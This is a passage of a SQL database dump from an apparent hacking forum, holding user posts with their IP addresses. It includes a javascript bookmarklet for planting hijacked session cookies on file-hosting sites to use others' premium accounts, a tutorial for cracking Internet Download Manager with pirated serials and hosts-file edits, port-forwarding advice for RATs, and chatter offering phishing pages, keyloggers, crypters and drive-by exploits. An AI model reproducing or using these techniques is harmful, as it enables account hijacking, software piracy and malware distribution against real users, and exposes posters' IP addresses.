'0'); INSERT INTO mybb_posts VALUES('391', '140', '361', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '54', 'Sin Cara', '1345263233', '[quote=\'Apathy\' pid=\'361\' dateline=\'1345220131\']\r\nCould I get the vouch copy? Me and the joker are BFF.\r\n[/quote]\r\n\r\nno sorry for the vouch copy...', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', '076577d6ea1ca0c3fe39f9f519afb0e7', '0', '0'); INSERT INTO mybb_posts VALUES('392', '112', '383', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345263314', '[quote=\'Quietus2\' pid=\'383\' dateline=\'1345244215\']\r\nCan u PM me? I want to download them.\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', 'cc4436e7160f90ea72ebe8693302cedf', '0', '0'); INSERT INTO mybb_posts VALUES('393', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '54', 'Sin Cara', '1345263363', 'Thanks for the fix dear :)', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', '8a4bc646d596af8a8c1e832c00b6b6b9', '0', '0'); INSERT INTO mybb_posts VALUES('394', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '54', 'Sin Cara', '1345266412', 'Thanks for the feedback:)', '119.154.48.85', '2006593621', '1', '0', '0', '0', '1', 'a0653a4fd4dd2ffae1138f49e8fb7e39', '0', '0'); INSERT INTO mybb_posts VALUES('395', '148', '0', '12', '[Tutorial]How to use Cookies and access Premium Accounts', '0', '54', 'Sin Cara', '1345268116', '[align=center][size=x-large][b]For Google Chrome[/b][/size]\r\n\r\n[size=large][[color=limegreen]?[/color]] Go to BookMark Manager\r\n[[color=limegreen]?[/color]] Organize -> Add Page\r\n[[color=limegreen]?[/color]] Name it whatever you want\r\n[[color=limegreen]?[/color]] Paste the JavaScript Code in URL\r\n[[color=limegreen]?[/color]] Then Save it [/size]\r\n\r\n[b][size=x-large]For Mozilla Firefox[/size][/b]\r\n\r\n[[size=large][color=limegreen]?[/color]] Go to Firefox -> BookMarks\r\n[[color=limegreen]?[/color]] Right Click -> New BookMarks\r\n[[color=limegreen]?[/color]] Name it whatever you want\r\n[[color=limegreen]?[/color]] Paste the JavaScript Code in Location\r\n[[color=limegreen]?[/color]] Then Save it [/size][/align][align=center][size=large]The Full javascript is given below:[/size][/align][align=center] [quote]javascript:hf=location.hostname;if(hf==\"depositfiles.com\"||hf==\"www.depositfiles.com\"){coo=\"autologin\";dom=\".depositfiles.com\";}else if(hf==\"easy-share.com\"||hf==\"www.easy-share.com\"){coo=\"PREMIUM\";dom=\".easy-share.com\";}else if(hf==\"filefactory.com\"||hf==\"www.filefactory.com\"){coo=\"ff_membership\";dom=\".filefactory.com\";}else if(hf==\"alldebrid.com\"||hf==\"www.alldebrid.com\"){coo=\"uid\";dom=\".alldebrid.com\";}else if(hf==\"alldebrid.org\"||hf==\"www.alldebrid.org\"){coo=\"uid\";dom=\".alldebrid.org\";}else if(hf==\"fileserve.com\"||hf==\"www.fileserve.com\"){coo=\"PHPSESSID\";dom=\".fileserve.com\";}else if(hf==\"filesonic.in\"||hf==\"www.filesonic.in\"){coo=\"PHPSESSID\";dom=\".filesonic.in\";}else if(hf==\"filesonic.com\"||hf==\"www.filesonic.com\"){coo=\"PHPSESSID\";dom=\".filesonic.com\";}else if(hf==\"hotfile.com\"||hf==\"www.hotfile.com\"){coo=\"auth\";dom=\".hotfile.com\";}else if(hf==\"uploading.com\"||hf==\"www.uploading.com\"){coo=\"remembered_user\";dom=\".uploading.com\";}else if(hf==\"megaupload.com\"||hf==\"www.megaupload.com\"){coo=\"user\";dom=\".megaupload.com\";}else if(hf==\"megavideo.com\"||hf==\"www.megavideo.com\"){coo=\"user\";dom=\".megavideo.com\";}else if(hf==\"rapidshare.com\"||hf==\"www.rapidshare.com\"){coo=\"enc\";dom=\".rapidshare.com\";}else if(hf==\"netload.in\"||hf==\"www.netload.in\"){coo=\"cookie_user\";dom=\".netload.in\";}else if(hf==\"4shared.com\"||hf==\"www.4shared.com\"){coo=\"PHPSESSID\";dom=\".4shared.com\";}else if(hf==\"oron.com\"||hf==\"www.oron.com\"){coo=\"xfss\";dom=\".oron.com\";}else if(hf==\"wupload.com\"||hf==\"www.wupload.com\"){coo=\"PHPSESSID\";dom=\".wupload.com\";}else if(hf==\"real-debrid.fr\"||hf==\"www.real-debrid.fr\"){coo=\"auth\";dom=\".real-debrid.fr\";}else if(hf==\"real-debrid.com\"||hf==\"www.real-debrid.com\"){coo=\"auth\";dom=\".real-debrid.com\";}else if(hf==\"uploadstation.com\"||hf==\"www.uploadstation.com\"){coo=\"PHPSESSID\";dom=\".uploadstation.com\";}else if(hf==\"turbobit.net\"||hf==\"www.turbobit.net\"){coo=\"kohanasession\";dom=\".turbobit.net\";}else if(hf==\"debridmax.com\"||hf==\"www.debridmax.com\"){coo=\"PHPSESSID\";dom=\".www.debridmax.com\";}else if(hf==\"fast-debrid.com\"||hf==\"www.fast-debrid.com\"){coo=\"PHPSESSID\";dom=\".www.fast-debrid.com\";}else if(hf==\"mega-debrid.eu\"||hf==\"www.mega-debrid.eu\"){coo=\"PHPSESSID\";dom=\".www.mega-debrid.eu\";}else if(hf==\"uploaded.to\"||hf==\"www.uploaded.to\"){coo=\"login\";dom=\".uploaded.to\";}else{alert(\"Site not supported please try again!\")+fonction.close;}c=prompt(\"Enter a cookie on \"+hf+\" if(hf==\"uploadstation.com\"||hf==\"www.uploadstation.com\"){coo=\"PHPSESSID\";ho=\".uploadstation.com\";}else if(hf==\"turbobit.net\"||hf==\"www.turbobit.net\"){coo=\"kohanasession\";ho=\".turbobit.net\";}else if(hf==\"debridmax.com\"||hf==\"www.debridmax.com\"){coo=\"PHPSESSID\";ho=\".www.debridmax.com\";}else if(hf==\"fast-debrid.com\"||hf==\"www.fast-debrid.com\"){coo=\"PHPSESSID\";ho=\".www.fast-debrid.com\";}else if(hf==\"mega-debrid.eu\"||hf==\"www.mega-debrid.eu\"){coo=\"PHPSESSID\";ho=\".www.mega-debrid.eu\";}if(c!==\"\"||c!==null+fonction.close)if(c.length < 70 && hf==\"uploaded.to\"){coo=\"PHPSESSID\";ho=\".uploaded.to\";}if(c!==\"\"||c!==null+fonction.close){r=d=new Date();nd=new Date(d.getFullYear()+2,2 ,11);void(document.cookie=coo+\"=\"+c+\";domain=\"+dom+\";path=/;\"+(r?\"expires=\"+nd:\"\"));location.reload(true);}if(c!==\"\"||c!==null+fonction.close){r=d=new Date();nd=new Date(d.getFullYear()+2,2 ,11);void(document.cookie=coo+\"=\"+c+\";host=\"+ho+\";path=/;\"+(r?\"expires=\"+nd:\"\"));location.reload(true);} [/quote][/align][align=center]\r\n[b][size=x-large]How to use: [/size][/b]\r\n[size=large][b][[color=limegreen]?[/color]][/b] Goto Any Filehosting\r\n[b][[color=limegreen]?[/color]][/b] Click the BookMarked page\r\n[b][[color=limegreen]?[/color]][/b] It Will Ask to enter the Cookies\r\n[b][[color=limegreen]?[/color]][/b] Enter it and Click Ok\r\n[b][[color=limegreen]?[/color]][/b] Done [/size]\r\n\r\n[/align][align=center][size=x-large][b]Supported Filehosting Sites by this Code:[/b]\r\n\r\n[/size][/align][align=center][size=large][[color=limegreen]?[/color]] [/size][b][size=large]Deposit Files[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]easy-share[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]filefactory[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]alldebrid[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]fileserve[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]filesonic[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]hotfile[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploading[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]megaupload[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]megavideo[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]rapidshare[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]netload[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]4shared[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]oron[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]wupload[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]real-debrid[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploadstation[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]debridmax[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]fast-debrid[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]mega-debrid[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploaded[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]turbobit[/size][/b]\r\n[size=large][[color=limegreen]?[/color]] [/size][b][size=large]debridmax[/size][/b][/align]\r\n\r\n[color=#DAA520][size=medium][b]Credits to :[/b][/size][/color] VirtualHack3r', '196.28.57.72', '-1004783288', '1', '0', '54', '1345268180', '1', '0298101d4e45714070926b709d6fa498', '0', '1345268180'); INSERT INTO mybb_posts VALUES('396', '149', '0', '12', 'How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345268332', 'This tutorial will allow you to register your Internet Download Manager (IDM) to a lifetime version. It mean that you don\'t have to patch it again and again each time you updates the program to a latest version which is seriously very annoying.\r\n\r\nHere how you do it.\r\n\r\nFirst register your IDM if you are using the trial version use one of the following serial key.\r\n\r\nCode:\r\nRLDGN-OV9WU-5W589-6VZH1\r\nHUDWE-UO689-6D27B-YM28M\r\nUK3DV-E0MNW-MLQYX-GENA1\r\n398ND-QNAGY-CMMZU-ZPI39\r\nGZLJY-X50S3-0S20D-NFRF9\r\nW3J5U-8U66N-D0B9M-54SLM\r\nEC0Q6-QN7UH-5S3JB-YZMEK\r\nUVQW0-X54FE-QW35Q-SNZF5\r\nFJJTJ-J0FLF-QCVBK-A287M\r\n\r\nSimply use any random name and email as you wish then click register. It will detected as a fake serial click on exit.\r\n\r\nNow go to run or press Window + R button and key in the following code.\r\n\r\nCode:\r\nnotepad %windir%\\system32\\drivers\\etc\\hosts\r\n\r\nand hit enter.\r\n\r\nA text file \"hosts\" will pop up. If you don\'t have permission to access it simply locate the file here.\r\n\r\nMy Computer > C: > Windows > System32 > drivers > etc\r\n\r\nand now right click and open the \"hosts\" file using notepad. If you can\'t just run it as admin or give full permission under its properties.\r\n\r\nNow add the following code at the end of the text\r\n\r\n[img]http://i.min.us/iej2wC.jpg[/img] \r\n\r\nCode:\r\n127.0.0.1 tonec.com\r\n127.0.0.1 www.tonec.com\r\n127.0.0.1 registeridm.com\r\n127.0.0.1 www.registeridm.com\r\n127.0.0.1 secure.registeridm.com\r\n127.0.0.1 internetdownloadmanager.com\r\n127.0.0.1 www.internetdownloadmanager.com\r\n127.0.0.1 secure.internetdownloadmanager.com\r\n127.0.0.1 mirror.internetdownloadmanager.com\r\n127.0.0.1 mirror2.internetdownloadmanager.com\r\n\r\nNow save and exit. You can now run your IDM and it will be fully registered. You don\'t have to re-patch again the next time you apply/install a newer version and it will stay full version forever!\r\n\r\n[img]http://i.min.us/ienZFE.jpg[/img] \r\n\r\nNote that this will block the communication form IDM server therefore you will not be able to check for updates. If you want to use the check for update option simply edit the \"hosts\" file and remove the code that have been added previously form it.\r\n\r\n[color=#00ff00][size=medium][b]Credits to CoolCrackerz.[/b][/size][/color]', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '57315c8ec9c7a09f49ee06ac92774b71', '0', '0'); INSERT INTO mybb_posts VALUES('397', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '54', 'Sin Cara', '1345275298', 'Please post a virus scan before posting any tool.', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '081cda28bbc5759acf470161c5e46a67', '0', '0'); INSERT INTO mybb_posts VALUES('398', '150', '0', '12', '[TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '54', 'Sin Cara', '1345282396', '[b][size=medium][color=#1E90FF]Easiest Way To Portforward (For RAT\'s)[/color] [/size][/b]\r\n\r\n[b]What you will need[/b]\r\n\r\nSkype\r\n\r\nNow Open up skype\r\n\r\nLog in\r\n\r\nOnce it has logged in it should look like the picture down below, go up to tools and click options \r\n\r\n[img]http://i.imgur.com/Shcww.png[/img]\r\n\r\n[img]http://i.imgur.com/2k3xR.png[/img]\r\n\r\nNext Click Advanced\r\n\r\n[img]http://i.imgur.com/emHRU.png[/img]\r\n\r\nNow click connection\r\n\r\n[img]http://i.imgur.com/LfIh1.png[/img]\r\n\r\nWhere it says use port, put in your desired port that you want.\r\n\r\n[color=#1E90FF]Disclaimer:[/color] Pictures+Tutorial from D4wn', '119.154.49.43', '2006593835', '1', '0', '0', '0', '1', '808f9e028f8bb75b6e247b1072b7da4d', '0', '0'); INSERT INTO mybb_posts VALUES('399', '151', '0', '24', 'Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '54', 'Sin Cara', '1345282815', '[align=center][b][size=xx-large][color=#4682B4][u]Windows 8 Skin pack 6.0[/u][/color][/size][/b][/align] \r\n[align=center][img]http://th07.deviantart.net/fs70/PRE/i/2011/260/4/7/8_skin_pack_6_0_x86_by_hameddanger-d4a5uxv.jpg[/img][/align] \r\n[align=center][i][size=large][color=#FFA500]Transform Windows 7 to Windows 8 build 8102 M3\r\n\r\nDownload online version with auto fix bugs: (recommended)\r\n\r\n7X86: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPack.exe]Link[/url]]\r\n7X64: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPack64.exe]Link[/url]]\r\nXP: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPackXP.exe]Link[/url]][/color][/size][/i][/align] \r\n[align=center][b][size=xx-large][color=#4682B4][u]ubuntu skin pack 7.0[/u][/color][/size][/b][/align] \r\n[align=center][img]http://th05.deviantart.net/fs70/PRE/i/2011/255/5/5/ubuntu_skin_pack_7_0_x86_by_hameddanger-d49pe01.jpg[/img][/align] \r\n[align=center][size=large][color=#FFA500]X86: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPack.exe]Link[/url]]\r\nX64: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPack64.exe]Link[/url]]\r\nXP: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPackXP.exe]Link[/url]][/color][/size][/align] \r\n[align=center][b][size=xx-large][color=#4682B4][u]Android Skin Pack 1.0[/u][/color][/size][/b][/align] \r\n[align=center][img]http://th09.deviantart.net/fs71/PRE/i/2011/275/8/e/android_skin_pack_1_0_x64_by_hameddanger-d4bk74s.jpg[/img][/align] \r\n[align=center][size=large][color=#ffa500]Transform Windows 7 To Android\r\n\r\nDownload online installer with auto fix bugs: (recommended)\r\n\r\n32 bit: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/AndroidSkinPack.exe]Link[/url]]\r\n64 bit: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/AndroidSkinPack64.exe]Link[/url]]\r\n\r\n[color=#ff0000][b]Credits to :[/b][/color] [/color][/size][b]G-Star Raw[/url][/b] [/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345282865', '1', '7d231053703d891568293b491249641b', '0', '1345282865'); INSERT INTO mybb_posts VALUES('400', '152', '0', '30', '[Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345283359', '[align=center] [img]http://www.magictrafficbot.com/images/m01b.gif[/img] [img]http://www.magictrafficbot.com/images/m02b.gif[/img] [img]http://www.magictrafficbot.com/images/m03b.gif[/img] \r\n\r\n[color=#ff0000][font=Impact][size=x-large]Original Sales Thread[/size][/font][/color]\r\nhttp://www.magictrafficbot.com/\r\n\r\n[img]http://www.minervity.com/wp-content/uploads/2009/04/download-button-transparent2.png[/img]\r\n[url=http://www.mediafire.com/?315ictp2tbjkpg8][b][color=#00ff00][size=x-large]Click Here[/size][/color][/b][/url] \r\n[/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345283727', '1', '0bd927a32c47f5ba90d28f35007237d6', '0', '1345283727'); INSERT INTO mybb_posts VALUES('401', '153', '0', '34', '[TUT] How to Render SMOKE and FIRE in Seconds', '0', '54', 'Sin Cara', '1345283932', '[align=center][img]http://i.imgur.com/Bwx2p.png[/img]\r\n\r\n[size=x-large][b][color=#00ff00]100%[/color] [color=#ff0000]Credits[/color] [color=#00ff00]to[/color]Vibrant[/b][/size]\r\n[/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345286961', '1', '0095b381c30d428c27f0706f3b026bd1', '0', '1345286961'); INSERT INTO mybb_posts VALUES('402', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '54', 'Sin Cara', '1345287395', 'I don\'t use key loggers but its good share :)', '119.154.49.43', '2006593835', '1', '0', '0', '0', '1', '6de24216084584fe6c64dfb03422d9b7', '0', '0'); INSERT INTO mybb_posts VALUES('403', '31', '86', '7', 'RE: How long are you online daily?', '0', '67', 'HoverCatz', '1345301728', 'um like 16 daily .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '712344a897e5c84b5b0eba314bd563fe', '0', '0'); INSERT INTO mybb_posts VALUES('404', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '62', 'R?????zo?', '1345306489', 'It does looks cool indeed, if you need any help with GFX I will be glad to help :)', '89.214.229.102', '1507255654', '1', '0', '0', '0', '1', '92a9da59f2e54e5ddb303160c4de510c', '0', '0'); INSERT INTO mybb_posts VALUES('405', '110', '278', '4', 'RE: It\'s Baws...the Baws', '0', '55', 'Baws', '1345328414', 'Thanks guys.\r\n\r\n[quote=\'t3h jok3r\' pid=\'278\' dateline=\'1344993832\']\r\nWelcome to L33T Hacking.\r\n\r\nThanks for signing up. So Mr. Baws, mind sharing what hacking skills you have?\r\n[/quote]\r\n\r\nWell, I can RAT/Keylogg/DDoS(hack?) and what else is there?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'dc8c78974df37e4afd6b5215aa3a5c53', '0', '0'); INSERT INTO mybb_posts VALUES('406', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '55', 'Baws', '1345328463', 'Looks nice, matches your signature. :P', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a12a85b3a38a09acb4e48315941fa67f', '0', '0'); INSERT INTO mybb_posts VALUES('407', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '55', 'Baws', '1345328525', 'Yeah I don\'t use these, but thanks for the share.\n\nLooks like you got lots of programs/files.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '50ddc1c1a6f168a43eb3725c83d8f842', '0', '0'); INSERT INTO mybb_posts VALUES('408', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '55', 'Baws', '1345328579', 'I\'ll try this sometime later, thanks.\n\nAlso, the SkyWalker sig looks sick.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1cf9a7352a39be2889eae90721bc58f3', '0', '0'); INSERT INTO mybb_posts VALUES('409', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '55', 'Baws', '1345328738', 'Thanks for the share, I\'ll try this out.\n\nAlright I got about 40 points ATM, lol.\n\nWhat sites do you suggest using?\n\nI got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay', '98.176.49.100', '1655714148', '0', '0', '55', '1345330207', '1', '9186c12a74a33f83797b28dfb3563b84', '0', '1345330207'); INSERT INTO mybb_posts VALUES('410', '99', '406', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345329245', '[quote=\'Baws\' pid=\'406\' dateline=\'1345328463\']\r\nLooks nice, matches your signature. :P\r\n[/quote]\r\n\r\nLol, it sure does. I keep this signature because I wanted it to match the theme but it seems to be a bit too big.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '1688dc1156fa2dc0292278dc5b439981', '0', '0'); INSERT INTO mybb_posts VALUES('411', '31', '86', '7', 'RE: How long are you online daily?', '0', '1', 't3h jok3r', '1345329296', '16 DAMN, or is it 16 only in summer vacation?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'c318b416ef2adb137ff560e04d3c6b6d', '0', '0'); INSERT INTO mybb_posts VALUES('412', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '1', 't3h jok3r', '1345329528', 'Tested and it works. The OP has a vouch from me so this download is clean. Also I have used this PID generator before, I love it.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'd0821d0d6c7a1d748772114708fd49aa', '0', '0'); INSERT INTO mybb_posts VALUES('413', '149', '396', '12', 'RE: How to crack your Internet Download Manager forever', '0', '1', 't3h jok3r', '1345329599', 'So does this only work with WIFI or all kinds of internet?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'dbd0c8776cf40248b3a7678b99026a31', '0', '0'); INSERT INTO mybb_posts VALUES('414', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '5', 'Timmy', '1345329805', 'Damn, I love the picture. It looks bad ass.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '9b212d31d81449a7c1f4a0f8a794188b', '0', '0'); INSERT INTO mybb_posts VALUES('415', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '1', 't3h jok3r', '1345329876', 'DDoS is not hacking but yeah RATTING is a good hacking technique.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '6e403ebb946a395638998e32edf58ab4', '0', '0'); INSERT INTO mybb_posts VALUES('416', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '5', 'Timmy', '1345329917', 'Welcome to L33T Hacking [s]boss[/s] Baws.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'dc665917cbd5cfa7445019a9ebf234b3', '0', '0'); INSERT INTO mybb_posts VALUES('417', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '5', 'Timmy', '1345329977', '[b]1. All downloads must contain a virus scan.[/b]\n2. Program must not already be distributed in public forums on LH.\n3. Download at your own risk!', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '92be17c29a373ab3774f79cc10b32642', '0', '0'); INSERT INTO mybb_posts VALUES('418', '154', '0', '19', '[Junk]New Logo', '0', '1', 't3h jok3r', '1345330348', 'Does the new logo look bad or good? If bad then I will revert back to the old green logo and make it bigger.', '41.174.14.146', '699272850', '1', '0', '1', '1345330567', '1', '9608fbc4cfd0c28597846761b71763ae', '0', '1345330567'); INSERT INTO mybb_posts VALUES('419', '154', '418', '19', '[Junk]New Logo', '0', '1', 't3h jok3r', '1345330570', 'This thread has been junked.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('420', '141', '409', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '1', 't3h jok3r', '1345330757', '[quote=\'Baws\' pid=\'409\' dateline=\'1345328738\']\r\nThanks for the share, I\'ll try this out.\r\n\r\nAlright I got about 40 points ATM, lol.\r\n\r\nWhat sites do you suggest using?\r\n\r\nI got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay\r\n[/quote]\r\n\r\nAren\'t those 6?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'd09388a8fc16b27cc5a1b7b538a73309', '0', '0'); INSERT INTO mybb_posts VALUES('421', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '1', 't3h jok3r', '1345330888', 'Thanks for this tutorial. I have made one FB phishing page I belive 2 years ago but never used it.\n\n[b]Edited[/b]\n\nForgot to mention. The first time I got hacked on FB was through Phishing.', '41.174.14.146', '699272850', '1', '0', '1', '1345330924', '1', 'f83465010e98e527c8db4d762525bc08', '0', '1345330924'); INSERT INTO mybb_posts VALUES('422', '145', '407', '30', 'RE: Stealers/Keyloggers', '0', '61', 'NXK', '1345332603', '[quote=\'Baws\' pid=\'407\' dateline=\'1345328525\']\r\nYeah I don\'t use these, but thanks for the share.\r\n\r\nLooks like you got lots of programs/files.\r\n[/quote]\r\n\r\nThat\'s just my hacking folder ;) over 10 gigs of hacking stuff.\r\n\r\nIll be releasing more java drive by\'s, RAT\'s etc', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5e7e2bb78a151d9148442071fa496d30', '0', '0'); INSERT INTO mybb_posts VALUES('423', '149', '413', '12', 'RE: How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345339062', '[quote=\'t3h jok3r\' pid=\'413\' dateline=\'1345329599\']\r\nSo does this only work with WIFI or all kinds of internet?\r\n[/quote]\r\n\r\nWorks for all kind of internet.', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', 'd694f75109de8c97840586ff40b8c5eb', '0', '0'); INSERT INTO mybb_posts VALUES('424', '152', '417', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345339161', '[quote=\'Timmy\' pid=\'417\' dateline=\'1345329977\']\r\n[b]1. All downloads must contain a virus scan.[/b]\r\n2. Program must not already be distributed in public forums on LH.\r\n3. Download at your own risk!\r\n[/quote]\r\n\r\n1. No need of virus scan.\r\n2. Not available for basic members', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', 'bd0a02ac572792ac729791c033aadf70', '0', '0'); INSERT INTO mybb_posts VALUES('425', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '54', 'Sin Cara', '1345339495', 'Thanks for the comments :)', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', '6925ddc0292a8120e4afdbacd502541e', '0', '0'); INSERT INTO mybb_posts VALUES('426', '141', '420', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '55', 'Baws', '1345341766', '[quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\']\r\n[quote=\'Baws\' pid=\'409\' dateline=\'1345328738\']\r\nThanks for the share, I\'ll try this out.\r\n\r\nAlright I got about 40 points ATM, lol.\r\n\r\nWhat sites do you suggest using?\r\n\r\nI got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay\r\n[/quote]\r\n\r\nAren\'t those 6?\r\n[/quote]\r\n\r\nWatch out guys, we gotta smartass over here.:D\r\n\r\nJust kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy:', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b767eccc328dc26ca15fde8e8a9698a4', '0', '0'); INSERT INTO mybb_posts VALUES('427', '132', '338', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '67', 'HoverCatz', '1345369805', 'Fileice costs real phone $ for me :|', '85.165.36.95', '1436886111', '1', '0', '67', '1345369814', '1', '9701378d8a9bfbf45911c8e0e5eb6f55', '0', '1345369814'); INSERT INTO mybb_posts VALUES('428', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '0', 'iapple32', '1345375246', 'Not working.It asks you for a \"quick survey\".HAHAHA', '141.237.119.231', '-1913817113', '0', '0', '0', '0', '1', 'e52d576968f9954c9943b6dc3f8c5e7e', '0', '0'); INSERT INTO mybb_posts VALUES('429', '132', '427', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '62', 'R?????zo?', '1345376324', '[quote=\'HoverCatz\' pid=\'427\' dateline=\'1345369805\']\r\nFileice costs real phone $ for me :|\r\n[/quote]\r\n\r\nsame here bro, so I can\'t download.\r\nThanks for the share though OP.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e248d41af749a20153f8c3235aa9d80c', '0', '0'); INSERT INTO mybb_posts VALUES('430', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '62', 'R?????zo?', '1345377993', 'Thanks for this, also I\'d love to know what sites you recommend or can I just use like 20 pages of msn and it works?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b58246709106c5e7d73d2ea25a45ad56', '0', '0'); INSERT INTO mybb_posts VALUES('431', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '53', 'sirchamp', '1345392491', 'Reupload please. Thank you', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5f8225c5fa916d3900bf8cdd828e8cf2', '0', '0'); INSERT INTO mybb_posts VALUES('432', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '67', 'HoverCatz', '1345408651', 'Ill send u a PM with the details :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '8c871099cdda5b672cecda9cb65ded27', '0', '0'); INSERT INTO mybb_posts VALUES('433', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345415977', 'All suggestions and feedbacks on the new theme are welcome.', 